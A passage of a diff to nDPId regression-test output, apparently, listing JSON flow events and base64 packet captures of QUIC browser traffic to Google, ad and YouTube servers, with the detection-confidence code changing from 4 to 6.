GBzvnoRPMUaIQjfu\/iJG8Z9aOtg+9TrcjVPX5a6Z5OwLXmzLGRT86sNwHqCjRgn2p2rVLx+fb+Z3Te8nZPOzZZjVZ6Ycx5SyZ9mziyd8btUND9hahYJM6KENGcOZwT1hkXcbxXROTQMsrykz+appT+Yt7eTfiM5Bijfzp++ctCCHMYRqgsN0FBlmqroqwE0JLDBDcemxPFQhEjVYok4hZ20aOLFNcrukblRhA1kFXY6Llbu6x+OdQ5ITJjtfy6N7s1G"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1621495410048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495410048,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFgVAAH4RX\/eokEAFgPgYAeZMAbsFTtl+yf8AAB0I\/leLTB44CRYANwAjTks9G8lrwt7+vZI0DaJowcQhxAH\/31dnEp\/wJDdcMs+96OC39JlFREj+x7uN8Y8I9xFEQ29E\/a6s8tYEG9mj1POKhRa4vw3FhUteagxK+Q3DYpMRbbQyi17yakV5fz21hd995vaP89QVSqNLp+aAiSc+XqrCI77QXUHLmsP3G+aV40nY4QYlAWTLcidClJxeZyPxcfdcTtSNYicTl2FhoQfgv\/izTkA8Ux332SxyJP9+2z+XN09eJbN3mFulwha40\/Pg2JJnk0Mm\/3T\/Ss1Ch6I\/57GVqncRgavCBlhRoSVFKd86cw4yV+Ach6\/lwZDc5hjr3\/nqPDyHyOk\/ic1VUkphYEW41unlD7wuiEsRixbz8q3byugh+YjmzBN4Tq47QChINSRWxj4L+BjNAoQ7Dai2X97Gz1ilrfn9+zsFqOwEj79WLqBpmtfOV849tRu3LnfZ5cuX\/MO2LG86yC\/6+pLC3ANUDv1RY2PC7sUP7d+2w6wZL9lz84eJ4EUxCxoGhaeWNioxpuXz6QtLrdpqY2rZZMA1WHZDaqTSa2btkRbvpzj3eovzOuknue\/RfsdTXXW3UMOpsc9ufpxUOiIdmQDlR9ngWJJOEe\/+zAdRs4VCI3jg3b+MFDhTwkUDRbn5RdNBFGIFGiXMmlzBNp8WabWafrmaKncF2rHZrecxeLVQ\/VSRUDmEKuHw40u+BNDILthR2FlUDDPJIVa+8K5xsZq0GxABXMcW8oZDwrq5xqDJZgYviq8SMcVntUHd4lVflGxbnfbnq3u\/Fk2Q\/Bs6qxzEdrCtn5KxNf5RTEOp58JUv2EOmrI1dyD87\/vOZYoRo4zjmc5dfyfUed+U6qOKm9QNfz5t+khBm6EE0js0KEb\/+Q6\/FDW5NzexjAFt74fp26YEUcjbbOPT98MLJKLLZsudFAxnHc8sILQ7K7ykQTsjx+T\/KOD3Enwwk1Vj7wEx2TRnVYzj9HBoyE1hYdqsP+4XG4c9\/T3CYr8iPwgA\/aTTnUnOQGVq12dFIPyHfSU0aW1473o2COwUVCD0ADVE218fKQZESyx3lIauVAb53dvU3\/wIawiFCz3acy7VEwSNGNM4p1UV+gN+HBUKUPzY8exwOAX4I27APon\/2ahebhkhpVTALzP5\/h7a9YZDH7+4j+sDYvJYLFK1kStX9AMMkrOXJtGqYpqgjUKCp2ykQVjHn\/RRRes+WwM6iqH92nVkHIv21SOZ8nVM86HIxmxEKln1LCCgKmw2iOSzvtfGSozM0d\/so3uqMQgMEaBugSKzaJiIYwVfVibAbpN0adGCr0odL4i5Z+yx0AuzsZ+EDcPN67poLOsf7GSYwLDiQkVusGkT9qI\/+26abOUxBiwO5qIu4c3OtO9Pl6FwYcO91fZh650fsDdAhxQSRml+yPU29m5YVwysjHTEwUlh7bDdMFpdQdpdmP+YBhsc0SG8HbyUGUWAXz9Q0pI6aQER6n+2b\/BjsFSwDoAdec89vuok0yzzVxihCQNqfDhwRMqvQlmf41fMjfoyQkvsYJMCbKU1y0ftuN2J8N7YcBgXEpkyZ73F9eUWeEUHAENs4C+x+znjGw\/xdKih19FGDi\/nhZNMlLhDpFyi82JaXj\/bLXeevjzdhjNvFrlWRduPD3Az3+Jt8O1Sm71ZcoDZgGY54gQ3OrsHryVHzWg9achFHZLn\/ZWA4PSjBQQH5WG6PFgfZhD+kj1oost9E1Z2g02u+oPqUAeEiw\/SGcRViFDskV2Cj6eFv\/nHh2vnTL8ODpgiQIs3IP3M"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1621495455961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495455961,"pkt":"AAAAAAAAAAEAaACzCABFAAVipjNAAH4RMkyokEAFZsLPs9SxAbsFTkz3yf8AAB0IW6VqPL9nKU0ANwBravUmWKq3yO8VZlOBqHgbki\/goI5n14Od4wyAZtlECAHCn0lzdaz8q7RFJaLaxg8bqaof4Y9E\/aCKkqi83SiSxj0wA9VaVnLuhoAUcP5pSIwdVZ226lDU\/fKJXCOWhj5U0vGsWctMBnACRJooqY\/EIe7zeS4gW9kRSye11BfEHBZvQCQ2Hw5tRRQO1ihfr3AH4BV+w18QXsSRjA3AgSLlWmVvNoGhvok75aqRHYiBSwdwNT9ZQk4cM6MThQObIM9OwmrZGYzdgcwWP\/FJvqDB39XhD+omQ8uC8mZ537oEh5AGXvor2yfynGKqmgp\/yT\/dH3topVKC+Ri4UD6+q6yMBizxV\/DHc+zcKb7bKMFFO1eiqXSiGPoIgEutHke5OqadU\/tLTj0WuUrML78PqgBRydLfJJ0hSojdqY\/HjdwJpZeFJwp7wKn8VRGG\/yvY2x6pil8wpOS6XvWHGvzNPxD6C+g5axKm9LfXWJkNn4V0vMRIJyOAoJsSgFe32K\/w60iIObURGr7LOTvgxY8kLZgGkxD8VmUWaxSsIipdY1zQzkND1VZO6t2zr\/a+Q8DohD1YPV6tlk6rn2prShAt77QE+pLlEwym1HnxiPCdcDtyW285Nk7kKruQ1mmAdcp7hpBdeQ73zBfPFm4kViXEkOmKqu2y8u2C\/dbP6WGDVgmEt50G\/TZ0SMJ\/1lXGfmrpbdAKoOxB7xEdy35+vcwsE1YFswDl5TGR+NBvTqNrjHDXACh8Cx53IWP59Ji2saD1Ye50T1Sx5LgA6SrpWbOlU9Rsgq\/TBSC1tQOH\/VmrKAut\/8nukuPoNtb1a5uUZ1c6bwAcpjf5TXN41pCYm69SI3nssNWo2dyLqOGKECefwPxQf15zCZ8qa6BPFMjjc5uFw2+UZJ6H9uVGcT6YOn9ATJjXV1rWnhxewQVVeqNiTOey+tQF+cjBBZLReI34HshIV8r1nlrST\/qXbWAKh7GeUQmJneZZhYb81MJMByTb73VBZXoZ6xGgTNyP\/dHOTR22ecj1LOs0qstF2wN9snIQZrrfX2JlF7dq2fFSKEshmXaVGCEL09hXFhHbq0QayKuLAWWI4aRof11r+CNpR\/NJ0Aqs+i4pRrJnNm6t4IC1bx4FGU7Nyx6ngu+TrgAfLdooE51VAlTUl0v7zV2KYm5RDSEpj7PgcRIvT7QAwBPfzFQ4j+lIz1HgE2KmRziUtymSXUNSNgt2udtGTPaV2DAgGZS6qazUIKNzkZIQp8q6s4lL6Pqeb5LG4kvEOeCmxo5wEofaOGvytEr8++Td9tOdy3u+6tQw8ZChKbNfJKWxhoOFUIA\/5YBmZFZSccanTHvVJto7VxFojeJZukeioQQjJDwBPHsywE3BtR7h6oz5boguk9Kou14u\/5g66uwMCuxQDPrXZcoTZsZa2HLwy2qe0ExuzZPw2HHvmOyZSAGQ+m\/BLcAwWVL927E2hs76eRGuJwqsY4GpvrOX1CbGRhwTxeliklR36iagwOV6ZLPHJGQ8sRMQ6E+CPifdBY0km0DQvehrT8ZiGdH6wl7zf3ONaN9EN6wUYANIeHCXhN9ihBg9GaQHoAfGloAC1v5PK1ylIeuftjWmCPhso3b9DRFisYli57JTJDMeFP014yikgmjmgpEmF7DxSG5Mv\/1+EFTtCib5OrXYmTEQm\/5mM09hj8zz\/HhlKsiMfbdKKTGX6XSTEBKV9L0IiOMNuHkh9x0VXilYm+QFUtpSkJC0TjJiw\/HyVRyGEOuTm4Ep5gOdRAcfPf\/R3xVB"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons3.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons3.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1621495692143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495692143,"pkt":"AAAAAAAAAAEA4PSECABFAAViwhdAAH4RV5yokEAFXWSX3eu2AbsFTqlwy\/8AAB0IytRHE\/BcidkAAEU0GAJLgq5zWCEW\/\/vpneUqridEkoosXOYvPFM+EGFgFEn1\/pdK2U+fbOyyD9aMCeGUBOZnfvyIfNO5K6N10kJD2wSuJMaHeVG8mTehPz6Z7xoPc5LRNHFpJc9TdwBWwPbj8ekTbabDuVDHMstO8xpXRQySbhJHU6wlq+klfEbii+8EVostEJjHVEa1OZRyeAxcg1YEz+0PhQrslK4lhYtYjv4daqrQ9huOezEOwJKVIALQJLGoJ4f2F0eqzdy6jHFW4Shtit+AoF5iUPYyY6JmIGKfalz9t2vSbZumTgJ9SLPadk+rld6hE4IFunALh2k0HHlflWmsTcHH4jZndWLbu2r2iLUOBVoiQ18gEn8zCFncnoY4ExTQLd0WhsHz1w74Rs230gs\/qIzBbpiNnor68kH6+ahcqnABZBlXRVXYrQtqzWMVecwWgFBr8kmDHNSbEsffCTExI7CQu3mzEUOiFNDs51itYsXzdmE7wEGo\/bGYgZblzPEz8chYGofZflNVoia8KxZj\/VLWXLY06JYSw0TbdHU6OZKpIlgWKPSUU9yWUDPgULA8g0V45R6QNOWEv\/+Xd5aZdfeHnkBDVK8YnbuFxEkxeTLfnF0HSQd2toTv8gz1i8eq0knZewiX9Qyn6hzHgP2\/U+hh2ui9eIuBGqxzkvyg3DOjUT9WKjYnMvT3pNBH\/YoJtrPxSn7XrrXNYYWmNcxW4oxEIL7wiLLLL7liAYBvwS7FLIJepFUJ89bcXkCLsjkN63okoguLX+ND2ec7J9VukjZ+dXxDIqV16passDORQcQv+hP9S1RE1mHSFBJt3dWs3kSbeTxL0\/jUX9wUMKCAKJsmn1JHBtj3SRd+Cq7RST4KNBpNpp+OrN5GS8zmmRP02n0QZdRAA\/cP8cayAz44AqG8Nmgu6qpMXQlCEJbdSMX8zW66ZG3A\/wWBiO6fXKXtPqq0B+fcrDGzggFgJ7\/X1FeMde1oO1KvB7K5FnKUeH6z5iHps9E6+eItgN1w2M0OXrE++u9FVrWPH31W5YKQVZMpI0U7re5kVQMzV9bJRcBuHYng7XfhD8k8uOEA1mD8rAI2acFs1IU7+t6xL5xpLL17JhawgaF8\/SfwzgEFHaQcPkz8ipFK3FbfGt15dt4gZ2CzlxYp7RaoRsZiNmF1SVZhPHx7EKffzikgMDfyCfUTej4mHFjDSBXvSBw\/tLvSe9zKIGZzW4YW5Zx2kF14W03Knayi7As27e\/ETroLvHWX+zYXh8lsCjXblUbFLn4OvB4Vvl6g7osC7YpQr9UoDjSRAa6delKk\/ZUwvlsmVlVdxie6KoM9xa4Kzoe6ANfADEjk2L3bHvC3ibZLII1p03Itmuh1fVJvnQ4PqLPmYJ6J8fjwoTytcU64MeofEY0xuIazjFponK+zHprMee9E4a13UVbglxsx2ynEryvHU7P2C9n3y1sUu0MlUWwRaMb2msNlm84Pn7t+d7khBduwQHoE47sarcouiL95rGRzCh6s8NudLolgOYJuEw4uamdMOpSbqhTz6in40vyUrVIdNnXic83DBKdCA+7fAJyj\/qP2NwPP5wjaudyfPKQUIUm\/ZWQd3dL20quz7Lifs+ZxH7e5Z79ubipc8483Vd9Aq+ZDmCrdC8DTUvYkNu8HRlFIJ\/87x6kDCqBpz\/Y6oKJ9fnDWzu3vGVK4nDx4jhx0IvaEpB8u7iVohyPAjcPcqis5bb\/b2l141\/Mkd7YUfg1edYX7s7jeiJZNXtRq20b9JPjsbcD\/aEE7zAWRgf9W"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 